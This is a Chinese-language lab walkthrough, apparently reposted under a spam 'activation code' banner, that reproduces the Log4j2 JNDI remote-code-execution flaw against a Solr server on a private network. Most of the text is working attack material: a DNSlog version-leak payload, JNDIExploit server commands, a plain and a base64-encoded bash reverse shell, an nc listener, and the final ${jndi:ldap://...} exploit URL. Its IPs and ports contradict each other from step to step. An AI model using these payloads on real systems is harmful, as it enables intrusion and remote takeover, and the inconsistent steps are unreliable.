柚子快報激活碼778899分享:log4j2漏洞復現(xiàn)
Log4j2是Apachel的一個java日志框架,我們借助它進行日志相關操作管理,然而在2021年未10g4j2爆出了遠程代碼執(zhí)行漏洞,屬于嚴重等級的漏洞
1、執(zhí)行以下命令啟動靶場環(huán)境并在瀏覽器訪問
2、在DNSlog平臺請求一個dns域名:
http://192.168.3.70:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.649god.dnslog.cn}
直接訪問
可知版本信息1.8.0
3、反彈shell需要使用JNDIExploit.v1.2
此時,
kali2024:中轉(zhuǎn)--192.168.3.232
kali2023:攻擊--192.168.3.137
centos7:靶機--192.168.3.70
首先在中轉(zhuǎn)機上使用JNDIExploit-1.2-SNAPSHOT.jar文件使用java啟動,命令如下:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.3.179
bash -i >& /dev/tcp/192.168.3.70/8080 0>&1
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTM3LzgwODAgMD4mMQ==} | {base64, -d} |bash" -A 192.168.3.137
攻擊機:開啟監(jiān)聽nc -lvvp 6666
此時構(gòu)造如下命令:
http://192.168.3.70:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.137:1389/0izjha}
訪問,成功反彈
http://192.168.3.70:8983為靶機的地址
192.168.3.232為中轉(zhuǎn)機地址
192.168.3.137為Kali攻擊機ip地址,此時要反彈shell
柚子快報激活碼778899分享:log4j2漏洞復現(xiàn)
推薦閱讀
本文內(nèi)容根據(jù)網(wǎng)絡資料整理,出于傳遞更多信息之目的,不代表金鑰匙跨境贊同其觀點和立場。
轉(zhuǎn)載請注明,如有侵權,聯(lián)系刪除。